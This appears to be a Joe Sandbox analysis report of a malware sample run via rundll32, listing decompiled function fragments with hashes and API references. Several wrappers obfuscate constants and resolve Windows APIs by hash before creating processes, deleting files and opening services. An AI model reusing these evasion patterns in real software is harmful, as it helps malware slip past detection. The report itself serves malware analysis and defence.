Opcode ID: 17f7976ac9e9d55e73ccc180a4db989e266e98219e045f9a63b873bfabc5d0aa
Instruction ID: 5cd2f35f43c97ca4945b5701e3fc13db3cba3f53332ee10a1f45c835a382b29d
Opcode Fuzzy Hash: 17f7976ac9e9d55e73ccc180a4db989e266e98219e045f9a63b873bfabc5d0aa
Instruction Fuzzy Hash: D5D0C979508242987924F6B56D02A8F7384DB021F6B616267E620CA0CAEF23B4466A35

Uniqueness

Uniqueness Score: -1.00%

Function 0019976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0019976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0018602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001907A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00199772
0x00199773
0x00199778
0x0019977a
0x0019977b
0x0019977e
0x0019977f
0x00199782
0x00199785
0x00199788
0x00199789
0x0019978c
0x0019978f
0x00199790
0x00199791
0x00199794
0x00199797
0x0019979a
0x0019979d
0x001997a0
0x001997a3
0x001997a6
0x001997a7
0x001997a8
0x001997ad
0x001997b7
0x001997c3
0x001997ca
0x001997d1
0x001997d8
0x001997df
0x001997e3
0x001997fc
0x00199816
0x0019981d

APIs

CreateProcessW.KERNEL32(0018591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0018591A), ref: 00199816

Memory Dump Source

Source File: 00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp, Offset: 00180000, based on PE: true

Associated: 00000008.00000002.2089487454.0000000000180000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2089525813.000000000019C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 7c2a6004f50002ed2ddd1c1aed94afc0e93d1d18424da75cae81ccecbc94d999
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 2111B372901148BFDF1A9FD6DC0ACDF7F7AEF89750F104148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10029D17, Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E10029D17(signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t14;
				signed int* _t20;
				signed int _t22;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				_Unknown_base(*)()* _t36;

				_t20 = 0x1004e598 + _a4 * 4;
				_t28 =  *0x1004d054; // 0x940b3682
				_t31 = _t30 | 0xffffffff;
				_t29 = _t28 ^  *_t20;
				_t22 = _t28 & 0x0000001f;
				asm("ror edx, cl");
				if(_t29 != _t31) {
					if(_t29 == 0) {
						_t11 = E10029C50(_t22, _a12, _a16); // executed
						if(_t11 == 0) {
							L7:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t31 ^  *0x1004d054;
							_t14 = 0;
							L8:
							return _t14;
						}
						_t36 = GetProcAddress(_t11, _a8);
						if(_t36 == 0) {
							goto L7;
						}
						 *_t20 = E10011E30(_t36);
						_t14 = _t36;
						goto L8;
					}
					return _t29;
				}
				return 0;
			}

0x10029d21
0x10029d2b
0x10029d31
0x10029d36
0x10029d38
0x10029d3b
0x10029d3f
0x10029d47
0x10029d54
0x10029d5d
0x10029d7c
0x10029d81
0x10029d89
0x10029d91
0x10029d93
0x10029d95
0x00000000
0x10029d95
0x10029d69
0x10029d6d
0x00000000
0x00000000
0x10029d76
0x10029d78
0x00000000
0x10029d78
0x00000000
0x10029d49
0x00000000

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4028b3ffdbf220f5ccbab449946e7a0f9cd60c0eee147c0f303152eafb118c99
Instruction ID: 2a7355f5bd8dfc1c477535d0dfa17a080f77eb11a6ba006502a217067f0a1b70
Opcode Fuzzy Hash: 4028b3ffdbf220f5ccbab449946e7a0f9cd60c0eee147c0f303152eafb118c99
Instruction Fuzzy Hash: 2F01B537700621AFFB15DE69ED80A8A37D6EB862E07A14121FE04DB155DA30D801E754

Uniqueness

Uniqueness Score: -1.00%

Function 0018B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0018B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0018602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001907A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0018b569
0x0018b56a
0x0018b56d
0x0018b572
0x0018b574
0x0018b577
0x0018b57a
0x0018b57d
0x0018b580
0x0018b583
0x0018b586
0x0018b587
0x0018b58a
0x0018b58d
0x0018b590
0x0018b593
0x0018b594
0x0018b595
0x0018b59a
0x0018b5a4
0x0018b5b8
0x0018b5c0
0x0018b5c4
0x0018b5cb
0x0018b5d2
0x0018b5d9
0x0018b5e6
0x0018b5fd
0x0018b604

APIs

CreateFileW.KERNELBASE(00190668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00190668,?,?,?,?), ref: 0018B5FD

Memory Dump Source

Source File: 00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp, Offset: 00180000, based on PE: true

Associated: 00000008.00000002.2089487454.0000000000180000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2089525813.000000000019C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 54ac6766b95983d5abad86214db9098898f9387150e588a93f4adfbf3b4a5535
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: C911C372801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 10031EE4, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10031EE4(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E10026850(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E1002A310(__eflags, _t4, 0xfa0, 0); // executed
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E100268B3(0);
				return _t35;
			}

0x10031eea
0x10031ef1
0x10031ef6
0x10031efa
0x10031f01
0x10031f07
0x10031f07
0x10031f0d
0x10031f0f
0x10031f12
0x10031f12
0x10031f15
0x10031f17
0x10031f1d
0x10031f21
0x10031f26
0x10031f2a
0x10031f2e
0x10031f30
0x10031f33
0x10031f39
0x10031f40
0x10031f44
0x10031f47
0x10031f4a
0x10031f4a
0x10031f4e
0x10031f51
0x10031f03
0x10031f03
0x10031f03
0x10031f53
0x10031f5e

APIs

Part of subcall function 10026850: RtlAllocateHeap.NTDLL(00000008,00000364,00000000,?,10024158,00000001,00000364,FFFFFFFF,000000FF), ref: 10026891

_free.LIBCMT ref: 10031F53

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: b71b12b2ef210f463b7843e26c027f50fdbc803602e45414ae83a0b50f81752a
Instruction ID: 5ecf24b48f6bf668a87eb7aba8164494cce5243ea809713a93c3c489f3a86baa
Opcode Fuzzy Hash: b71b12b2ef210f463b7843e26c027f50fdbc803602e45414ae83a0b50f81752a
Instruction Fuzzy Hash: F8012B72604356AFC321CF64D8819C9FBA8EB093B0F550739E559A76C0D770AC10C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0019981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0019981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0018602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001907A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00199821
0x00199822
0x00199825
0x00199828
0x0019982a
0x0019982c
0x0019982f
0x00199832
0x00199835
0x00199836
0x00199837
0x0019983c
0x00199855
0x00199858
0x0019985f
0x00199866
0x0019986d
0x00199874
0x0019987b
0x0019988e
0x0019989b
0x001998a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001887F2,0000CAAE,0000510C,AD82F196), ref: 0019989B

Memory Dump Source

Source File: 00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp, Offset: 00180000, based on PE: true

Associated: 00000008.00000002.2089487454.0000000000180000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2089525813.000000000019C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: d9d66b13783ca51ac802cabf98ef4ee741457b67345811e7289b2982487ce7ec
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: E7019A72801208FBDF08EFD5D846CDFBFB9EF85310F108188F908A6220E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00197BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00197BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0018602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001907A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00197bf7
0x00197bf8
0x00197bfa
0x00197bfd
0x00197bff
0x00197c02
0x00197c06
0x00197c07
0x00197c0f
0x00197c1d
0x00197c25
0x00197c2d
0x00197c31
0x00197c38
0x00197c3f
0x00197c46
0x00197c4a
0x00197c5e
0x00197c67
0x00197c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00197C67

Memory Dump Source

Source File: 00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp, Offset: 00180000, based on PE: true

Associated: 00000008.00000002.2089487454.0000000000180000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2089525813.000000000019C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 2d1eec93206551ac85bf466281c2be04050366874c02df072c884ec374a669ec
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: C70128B1901208BFEB09DFA4C84A8EEBBB9EB54314F208198F405A7240EBB15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 0018F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0018F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0018602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001907A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0018f662
0x0018f663
0x0018f665
0x0018f668
0x0018f66a
0x0018f66d
0x0018f670
0x0018f673
0x0018f677
0x0018f678
0x0018f67d
0x0018f687
0x0018f693
0x0018f69a
0x0018f6a1
0x0018f6a5
0x0018f6a9
0x0018f6b0
0x0018f6c9
0x0018f6d8
0x0018f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0018F6D8

Memory Dump Source

Source File: 00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp, Offset: 00180000, based on PE: true

Associated: 00000008.00000002.2089487454.0000000000180000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2089525813.000000000019C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 1d10cdd3f0da6cd448c9e129b1fedde90ba4e529f113ee5c2f48db57789dc8ae
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: D901E5B6901208BFEF05AF94DC068DF7F75EB15324F148188F90462250D7B25F61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10026850, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10026850(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x1004e624, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E1002E493();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E1002449E(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E10010107(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x10026856
0x1002685b
0x10026869
0x10026869
0x1002686f
0x10026871
0x10026871
0x10026888
0x10026891
0x10026899
0x00000000
0x00000000
0x10026879
0x1002687b
0x1002689d
0x100268a2
0x100268a8
0x00000000
0x100268a8
0x10026884
0x10026886
0x00000000
0x00000000
0x10026886
0x00000000
0x10026888
0x10026861
0x10026867
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000364,00000000,?,10024158,00000001,00000364,FFFFFFFF,000000FF), ref: 10026891

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 89b74a9fedc6c44e7e8eb0d2ef1166fcc57b5d159e965e5deff0e72c928abcbc
Instruction ID: cee442b2a179b10d771ae8e348697f5776a900ac618982ed1d16fb6086920af7
Opcode Fuzzy Hash: 89b74a9fedc6c44e7e8eb0d2ef1166fcc57b5d159e965e5deff0e72c928abcbc
Instruction Fuzzy Hash: F1F0B43560162566DB51DE66ED05B5A3798EB497A0BA24221BC04D71C4DE30FC0082E4

Uniqueness

Uniqueness Score: -1.00%

Function 0018B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0018B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0018602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001907A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0018b6f3
0x0018b6f8
0x0018b702
0x0018b70b
0x0018b712
0x0018b719
0x0018b720
0x0018b727
0x0018b72e
0x0018b747
0x0018b759
0x0018b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0018B759

Memory Dump Source

Source File: 00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp, Offset: 00180000, based on PE: true

Associated: 00000008.00000002.2089487454.0000000000180000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2089525813.000000000019C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 16f570cd83885e310e0428b45de15fa061060d4e3722239e030ae1577184da53
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 5B0128B6941308FBEF45DFD4DD06A9E7BB5EB18714F108188FA09661A0D3B25A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0019AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0019AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0018602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001907A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0019aa3f
0x0019aa40
0x0019aa41
0x0019aa44
0x0019aa47
0x0019aa4b
0x0019aa4c
0x0019aa51
0x0019aa5b
0x0019aa64
0x0019aa68
0x0019aa6f
0x0019aa76
0x0019aa8d
0x0019aa90
0x0019aa9d
0x0019aaa8
0x0019aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0019AAA8

Memory Dump Source

Source File: 00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp, Offset: 00180000, based on PE: true

Associated: 00000008.00000002.2089487454.0000000000180000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2089525813.000000000019C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 4adee06f0e74ff1fb7dacfbfae89e20ca21eb7d4cbe8e012484cb7b8de0ebfc9
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 61F046B190020CFFDF08EF94D94A89EBBB5EB44304F108088F805A6250D3B29B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000D717, Relevance: 1.5, APIs: 1, Instructions: 33
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000D717(void* __ecx, signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t12;
				_Unknown_base(*)()* _t13;
				_Unknown_base(*)()** _t19;
				signed int _t20;
				signed int _t21;

				_t19 = 0x1004e040 + _a4 * 4;
				_t10 =  *_t19;
				_t21 = _t20 | 0xffffffff;
				if(_t10 == _t21) {
					L6:
					return 0;
				}
				if(_t10 == 0) {
					_t12 = E1000D67D(__ecx, _a12, _a16); // executed
					if(_t12 == 0) {
						L5:
						 *_t19 = _t21;
						goto L6;
					}
					_t13 = GetProcAddress(_t12, _a8);
					if(_t13 == 0) {
						goto L5;
					}
					 *_t19 = _t13;
					return _t13;
				}
				return _t10;
			}

0x1000d71f
0x1000d726
0x1000d728
0x1000d72d
0x1000d75a
0x00000000
0x1000d75a
0x1000d731
0x1000d739
0x1000d742
0x1000d758
0x1000d758
0x00000000
0x1000d758
0x1000d748
0x1000d750
0x00000000
0x00000000
0x1000d754
0x00000000
0x1000d754
0x1000d75f

APIs

GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,1000D871,00000001,FlsFree,10043994,FlsFree,00000000,?,10005B57,FFFFFFFF,1000528D), ref: 1000D748

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 0cd0d46ad6376f16837434476ef1c2c325eb3e89ea54d8bfda6593936f27b7ea
Instruction ID: 6ae50cf1bc1ad4758d4872c1d4d64a6e8e48722a32411315d8df479ee4492f30
Opcode Fuzzy Hash: 0cd0d46ad6376f16837434476ef1c2c325eb3e89ea54d8bfda6593936f27b7ea
Instruction Fuzzy Hash: 8DF082362086569FAF02EE69AC4094E37E8EF017E07100526FA18D6198FB71D810CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00185FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00185FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0018602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001907A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00185fb5
0x00185fb6
0x00185fb7
0x00185fbb
0x00185fbc
0x00185fc1
0x00185fcb
0x00185fd7
0x00185fde
0x00185fe5
0x00185ffc
0x00185fff
0x00186006
0x0018600d
0x0018601a
